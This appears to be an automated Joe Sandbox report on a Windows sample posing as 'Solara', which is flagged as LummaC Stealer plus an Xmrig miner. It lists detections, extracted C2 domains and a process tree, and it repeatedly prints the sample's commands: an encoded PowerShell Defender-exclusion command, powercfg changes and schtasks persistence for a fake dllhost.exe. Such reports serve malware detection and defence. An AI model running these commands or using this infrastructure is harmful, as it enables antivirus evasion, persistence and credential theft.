Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Solara.exe.bin.exe

Overview

General Information

Sample name:Solara.exe.bin.exe
Analysis ID:1638549
MD5:5a09a42cffc878b0bb34d9795592a939
SHA1:4d236b48e09f1a9b408ac8477f1919aea83a73d1
SHA256:343db8302648e9993ba3455a5c5013c22e618b186f7bfdfb653f193e386b2559
Tags:exeuser-TornadoAV_dev
Infos:

Detection

LummaC Stealer, Xmrig
Score:100
Range:0 - 100
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Schedule system process
Yara detected LummaC Stealer
Yara detected Xmrig cryptocurrency miner
C2 URLs / IPs found in malware configuration
Connects to a pastebin service (likely for C&C)
Contains functionality to inject code into remote processes
Encrypted powershell cmdline option found
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
Joe Sandbox ML detected suspicious sample
Loading BitLocker PowerShell Module
Modifies power options to not sleep / hibernate
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sample is not signed and drops a device driver
Sample uses string decryption to hide its real strings
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Uses powercfg.exe to modify the power settings
Uses schtasks.exe or at.exe to add and modify task schedules
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to modify clipboard data
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates driver files
Creates files inside the system directory
Detected non-DNS traffic on DNS port
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains an invalid checksum
PE file contains more sections than normal
PE file contains sections with non-standard names
PE file does not import any functions
PE file overlay found
Queries disk information (often used to detect virtual machines)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Searches for user specific document files
Sigma detected: Suspicious Execution of Powershell with Base64
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • Solara.exe.bin.exe (PID: 6856 cmdline: "C:\Users\user\Desktop\Solara.exe.bin.exe" MD5: 5A09A42CFFC878B0BB34D9795592A939)
    • conhost.exe (PID: 6940 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • Solara.exe.bin.exe (PID: 5928 cmdline: "C:\Users\user\Desktop\Solara.exe.bin.exe" MD5: 5A09A42CFFC878B0BB34D9795592A939)
      • Z6T9189FJQPDA5HSM49.exe (PID: 6908 cmdline: "C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exe" MD5: C11A82D699A06D9B8BA4296E0C562AE4)
        • cmd.exe (PID: 2688 cmdline: "cmd.exe" /C powershell -EncodedCommand "PAAjAEIAbwBzAEIAWgB3AG0ATwAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAFIAUgBTAFcAcQAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBIAEEAbwBFAFcAYwBCACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHcAagBoADAAdwB2ACMAPgA=" & powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 & powercfg /hibernate off MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 1764 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 5940 cmdline: powershell -EncodedCommand "PAAjAEIAbwBzAEIAWgB3AG0ATwAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAFIAUgBTAFcAcQAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBIAEEAbwBFAFcAYwBCACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHcAagBoADAAdwB2ACMAPgA=" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
            • WmiPrvSE.exe (PID: 7208 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
          • powercfg.exe (PID: 7440 cmdline: powercfg /x -hibernate-timeout-ac 0 MD5: 9D71DBDD3AD017EC69554ACF9CAADD05)
        • cmd.exe (PID: 7340 cmdline: "cmd.exe" /c SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 7376 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • schtasks.exe (PID: 7452 cmdline: SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe" MD5: 48C2FE20575769DE916F48EF0676A965)
        • cmd.exe (PID: 7368 cmdline: "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "NvStray\NvStrayService_bk1998" /TR "C:\ProgramData\Dllhost\dllhost.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 7384 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • schtasks.exe (PID: 7464 cmdline: SCHTASKS /CREATE /SC HOURLY /TN "NvStray\NvStrayService_bk1998" /TR "C:\ProgramData\Dllhost\dllhost.exe" MD5: 48C2FE20575769DE916F48EF0676A965)
    • WerFault.exe (PID: 1764 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6856 -s 400 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • svchost.exe (PID: 7592 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
xmrigAccording to PCrisk, XMRIG is a completely legitimate open-source application that utilizes system CPUs to mine Monero cryptocurrency. Unfortunately, criminals generate revenue by infiltrating this app into systems without users' consent. This deceptive marketing method is called "bundling".In most cases, "bundling" is used to infiltrate several potentially unwanted programs (PUAs) at once. So, there is a high probability that XMRIG Virus came with a number of adware-type applications that deliver intrusive ads and gather sensitive information.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.xmrig
{"C2 url": ["citydisco.bet/gdJIS", "featureccus.shop/bdMAn", "mrodularmall.top/aNzS", "jowinjoinery.icu/bdWUa", "legenassedk.top/bdpWO", "htardwarehu.icu/Sbdsa", "cjlaspcorne.icu/DbIps", "bugildbett.top/bAuz"]}
SourceRuleDescriptionAuthorStrings
00000002.00000003.974422341.00000000011F8000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
    00000008.00000002.1093031498.000000000328D000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
      00000002.00000002.2169158568.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_LummaCStealer_4Yara detected LummaC StealerJoe Security
        00000000.00000002.962652813.0000000002E7D000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_LummaCStealer_4Yara detected LummaC StealerJoe Security
          00000002.00000003.974203654.00000000011DD000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            Click to see the 3 entries
            SourceRuleDescriptionAuthorStrings
            2.2.Solara.exe.bin.exe.400000.0.raw.unpackJoeSecurity_LummaCStealer_4Yara detected LummaC StealerJoe Security
              2.2.Solara.exe.bin.exe.400000.0.unpackJoeSecurity_LummaCStealer_4Yara detected LummaC StealerJoe Security
                8.2.Z6T9189FJQPDA5HSM49.exe.324777d.0.unpackJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security

                  System Summary

                  barindex
                  Source: File createdAuthor: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exe, ProcessId: 6908, TargetFilename: C:\ProgramData\Dllhost\dllhost.exe
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "cmd.exe" /C powershell -EncodedCommand "PAAjAEIAbwBzAEIAWgB3AG0ATwAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAFIAUgBTAFcAcQAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBIAEEAbwBFAFcAYwBCACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHcAagBoADAAdwB2ACMAPgA=" & powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 & powercfg /hibernate off, CommandLine: "cmd.exe" /C powershell -EncodedCommand "PAAjAEIAbwBzAEIAWgB3AG0ATwAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAFIAUgBTAFcAcQAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBIAEEAbwBFAFcAYwBCACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHcAagBoADAAdwB2ACMAPgA=" & powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 & powercfg /hibernate off, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exe", ParentImage: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exe, ParentProcessId: 6908, ParentProcessName: Z6T9189FJQPDA5HSM49.exe, ProcessCommandLine: "cmd.exe" /C powershell -EncodedCommand "PAAjAEIAbwBzAEIAWgB3AG0ATwAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAFIAUgBTAFcAcQAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBIAEEAbwBFAFcAYwBCACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHcAagBoADAAdwB2ACMAPgA=" & powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 & powercfg /hibernate off, ProcessId: 2688, ProcessName: cmd.exe
                  Source: Process startedAuthor: frack113: Data: Command: powershell -EncodedCommand "PAAjAEIAbwBzAEIAWgB3AG0ATwAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAFIAUgBTAFcAcQAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBIAEEAbwBFAFcAYwBCACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHcAagBoADAAdwB2ACMAPgA=" , CommandLine: powershell -EncodedCommand "PAAjAEIAbwBzAEIAWgB3AG0ATwAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAFIAUgBTAFcAcQAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBIAEEAbwBFAFcAYwBCACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHcAagBoADAAdwB2ACMAPgA=" , CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "cmd.exe" /C powershell -EncodedCommand "PAAjAEIAbwBzAEIAWgB3AG0ATwAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAFIAUgBTAFcAcQAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBIAEEAbwBFAFcAYwBCACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHcAagBoADAAdwB2ACMAPgA=" & powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 & powercfg /hibernate off, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 2688, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -EncodedCommand "PAAjAEIAbwBzAEIAWgB3AG0ATwAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAFIAUgBTAFcAcQAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBIAEEAbwBFAFcAYwBCACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHcAagBoADAAdwB2ACMAPgA=" , ProcessId: 5940, ProcessName: powershell.exe
                  Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -EncodedCommand "PAAjAEIAbwBzAEIAWgB3AG0ATwAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAFIAUgBTAFcAcQAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBIAEEAbwBFAFcAYwBCACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHcAagBoADAAdwB2ACMAPgA=" , CommandLine: powershell -EncodedCommand "PAAjAEIAbwBzAEIAWgB3AG0ATwAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAFIAUgBTAFcAcQAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBIAEEAbwBFAFcAYwBCACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHcAagBoADAAdwB2ACMAPgA=" , CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "cmd.exe" /C powershell -EncodedCommand "PAAjAEIAbwBzAEIAWgB3AG0ATwAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAFIAUgBTAFcAcQAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBIAEEAbwBFAFcAYwBCACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHcAagBoADAAdwB2ACMAPgA=" & powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 & powercfg /hibernate off, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 2688, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -EncodedCommand "PAAjAEIAbwBzAEIAWgB3AG0ATwAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAFIAUgBTAFcAcQAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBIAEEAbwBFAFcAYwBCACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHcAagBoADAAdwB2ACMAPgA=" , ProcessId: 5940, ProcessName: powershell.exe
                  Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 628, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 7592, ProcessName: svchost.exe

                  Persistence and Installation Behavior

                  barindex
                  Source: Process startedAuthor: Joe Security: Data: Command: "cmd.exe" /c SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe", CommandLine: "cmd.exe" /c SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exe", ParentImage: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exe, ParentProcessId: 6908, ParentProcessName: Z6T9189FJQPDA5HSM49.exe, ProcessCommandLine: "cmd.exe" /c SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe", ProcessId: 7340, ProcessName: cmd.exe
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2025-03-14T14:22:17.843558+010020283713Unknown Traffic192.168.2.849682188.114.96.3443TCP
                  2025-03-14T14:22:19.456358+010020283713Unknown Traffic192.168.2.849684188.114.96.3443TCP
                  2025-03-14T14:22:20.584810+010020283713Unknown Traffic192.168.2.849686188.114.96.3443TCP
                  2025-03-14T14:22:21.746593+010020283713Unknown Traffic192.168.2.849690188.114.96.3443TCP
                  2025-03-14T14:22:23.466843+010020283713Unknown Traffic192.168.2.849691188.114.96.3443TCP
                  2025-03-14T14:22:25.007544+010020283713Unknown Traffic192.168.2.849692188.114.96.3443TCP
                  2025-03-14T14:22:27.767167+010020283713Unknown Traffic192.168.2.849693188.114.96.3443TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2025-03-14T14:22:33.625060+010028290562Crypto Currency Mining Activity Detected192.168.2.849697185.215.113.5180TCP

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Source: Solara.exe.bin.exeAvira: detected
                  Source: https://citydisco.bet:443/gdJISNzAvira URL Cloud: Label: malware
                  Source: https://citydisco.bet/gdJISreAvira URL Cloud: Label: malware
                  Source: https://citydisco.bet/02Avira URL Cloud: Label: malware
                  Source: https://citydisco.bet/f3Avira URL Cloud: Label: malware
                  Source: https://citydisco.bet/gdJISjkJvrAvira URL Cloud: Label: malware
                  Source: https://citydisco.bet/gdJISdtzYrvZAvira URL Cloud: Label: malware
                  Source: 00000000.00000002.962652813.0000000002E7D000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: LummaC {"C2 url": ["citydisco.bet/gdJIS", "featureccus.shop/bdMAn", "mrodularmall.top/aNzS", "jowinjoinery.icu/bdWUa", "legenassedk.top/bdpWO", "htardwarehu.icu/Sbdsa", "cjlaspcorne.icu/DbIps", "bugildbett.top/bAuz"]}
                  Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exeReversingLabs: Detection: 81%
                  Source: Solara.exe.bin.exeVirustotal: Detection: 76%Perma Link
                  Source: Solara.exe.bin.exeReversingLabs: Detection: 76%
                  Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                  Source: 00000000.00000002.962652813.0000000002E7D000.00000004.00000020.00020000.00000000.sdmpString decryptor: citydisco.bet/gdJIS
                  Source: 00000000.00000002.962652813.0000000002E7D000.00000004.00000020.00020000.00000000.sdmpString decryptor: featureccus.shop/bdMAn
                  Source: 00000000.00000002.962652813.0000000002E7D000.00000004.00000020.00020000.00000000.sdmpString decryptor: mrodularmall.top/aNzS
                  Source: 00000000.00000002.962652813.0000000002E7D000.00000004.00000020.00020000.00000000.sdmpString decryptor: jowinjoinery.icu/bdWUa
                  Source: 00000000.00000002.962652813.0000000002E7D000.00000004.00000020.00020000.00000000.sdmpString decryptor: legenassedk.top/bdpWO
                  Source: 00000000.00000002.962652813.0000000002E7D000.00000004.00000020.00020000.00000000.sdmpString decryptor: htardwarehu.icu/Sbdsa
                  Source: 00000000.00000002.962652813.0000000002E7D000.00000004.00000020.00020000.00000000.sdmpString decryptor: cjlaspcorne.icu/DbIps
                  Source: 00000000.00000002.962652813.0000000002E7D000.00000004.00000020.00020000.00000000.sdmpString decryptor: bugildbett.top/bAuz
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 2_2_0041BAC1 CryptUnprotectData,CryptUnprotectData,CryptUnprotectData,2_2_0041BAC1

                  Bitcoin Miner

                  barindex
                  Source: Yara matchFile source: 8.2.Z6T9189FJQPDA5HSM49.exe.324777d.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000008.00000002.1093031498.000000000328D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: Solara.exe.bin.exe PID: 5928, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: Z6T9189FJQPDA5HSM49.exe PID: 6908, type: MEMORYSTR
                  Source: Solara.exe.bin.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:49682 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:49684 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:49686 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:49690 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:49691 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:49692 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:49693 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 104.20.4.235:443 -> 192.168.2.8:49695 version: TLS 1.2
                  Source: Solara.exe.bin.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                  Source: Binary string: C:\Users\Administrator\Desktop\Pch3lkinMinerBuilder\Task32Main\Task32Main\obj\Debug\Task32Main.pdb source: Solara.exe.bin.exe, 00000002.00000003.1636690920.0000000001266000.00000004.00000020.00020000.00000000.sdmp, Solara.exe.bin.exe, 00000002.00000003.1636646146.000000000122F000.00000004.00000020.00020000.00000000.sdmp, Z6T9189FJQPDA5HSM49.exe, 00000008.00000000.1036685128.0000000000E22000.00000002.00000001.01000000.00000006.sdmp, Z6T9189FJQPDA5HSM49.exe.2.dr
                  Source: Binary string: d:\hotproject\winring0\source\dll\sys\lib\amd64\WinRing0.pdb source: WinRing0x64.sys.8.dr
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 0_2_0094FCDE FindFirstFileExW,0_2_0094FCDE
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 0_2_0094FD8F FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_0094FD8F
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 2_2_0094FCDE FindFirstFileExW,2_2_0094FCDE
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 2_2_0094FD8F FindFirstFileExW,FindNextFileW,FindClose,FindClose,2_2_0094FD8F
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx+4Ch]2_2_00442800
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx-1AB210DCh]2_2_0040D830
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax-30h]2_2_004490C0
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 4x nop then movzx edi, byte ptr [ebx+ecx]2_2_0044816C
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 4x nop then mov dword ptr [esp], eax2_2_00410993
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx+35B9B860h]2_2_0041BAC1
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 4x nop then movzx esi, byte ptr [esp+eax-56B7A16Ch]2_2_0041BAC1
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 4x nop then movzx esi, byte ptr [esp+ebp+02h]2_2_00429460
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 4x nop then mov word ptr [ecx], dx2_2_00448CC3
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 4x nop then lea edi, dword ptr [eax-0000008Ah]2_2_0044BCE0
